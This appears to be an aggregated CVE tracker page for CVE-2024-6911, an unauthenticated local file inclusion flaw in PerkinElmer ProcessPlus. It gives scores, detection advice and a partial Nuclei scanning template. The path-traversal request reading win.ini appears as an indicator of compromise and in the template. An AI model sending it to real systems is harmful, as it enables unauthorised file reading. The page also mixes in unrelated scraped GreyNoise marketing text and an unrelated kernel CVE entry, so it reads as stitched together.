CVE-2024-6911
published 2024-07-22CVE-2024-6911: Files on the Windows system are accessible without authentication to external parties due to a local file inclusion in PerkinElmer ProcessPlus.This issue…
PriorityP259high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
4.94%
91.1th percentile
Files on the Windows system are accessible without authentication to external parties due to a local file inclusion in PerkinElmer ProcessPlus.This issue affects ProcessPlus: through 1.11.6507.0.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| perkinelmer | processplus | <= 1.11.6507.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
path/ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\win.ini
- →Detect LFI exploitation attempts against PerkinElmer ProcessPlus by monitoring HTTP GET requests to /ProcessPlus/Log/Download/ containing path traversal sequences (e.g., '..\..\')
- ·Vulnerability affects PerkinElmer ProcessPlus versions through 1.11.6507.0; no authentication is required to exploit the local file inclusion endpoint ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv4.08.7HIGHCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
PerkinElmer ProcessPlus <= 1.11.6507.0 - Local File Inclusion
nuclei·CVSS 8.7
CVE-2024-6911 [HIGH] PerkinElmer ProcessPlus <= 1.11.6507.0 - Local File Inclusion
PerkinElmer ProcessPlus Process Plus - Perten Instruments")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\win.ini HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"bit app support","fonts","extensions")'
- 'contains(content_type, "text/plain")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100a3bd78093e97e558a145b82ddd777a238a5ea26ddff1901e392d7d22a327effc02204efe4da29a663ed1543f5b2d1fefdba474367aa84ca745052188edb51cc342c6:922c64590222798bb761d5b6d8e72950
Greynoiseio
NoiseLetter January 2026
blogs_greynoiseio
NoiseLetter January 2026
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Bugzilla
CVE-2024-27408 kernel: dmaengine: dw-edma: eDMA: Add sync read before starting the DMA transfer in remote setup
bugzilla·2024-05-17·CVSS 4.7
CVE-2024-27408 [MEDIUM] CVE-2024-27408 kernel: dmaengine: dw-edma: eDMA: Add sync read before starting the DMA transfer in remote setup
CVE-2024-27408 kernel: dmaengine: dw-edma: eDMA: Add sync read before starting the DMA transfer in remote setup
In the Linux kernel, the following vulnerability has been resolved:
dmaengine: dw-edma: eDMA: Add sync read before starting the DMA transfer in remote setup
The Linux kernel CVE team has assigned CVE-2024-27408 to this issue.
Upstream advisory:
https://lore.kernel.org/linux-cve-announce/2024051700-CVE-2024-27408-6911@gregkh/T
Discussion:
Created kernel tracking bugs for this issue:
Affects: fedora-all [bug 2281118]
---
The result of automatic check (that is developed by Alexander Larkin) for this CVE-2024-27408 is: SKIP No affected files built, so skip this CVE NO - - unknown (where first YES/NO value means if related sources built).
2024-07-22
Published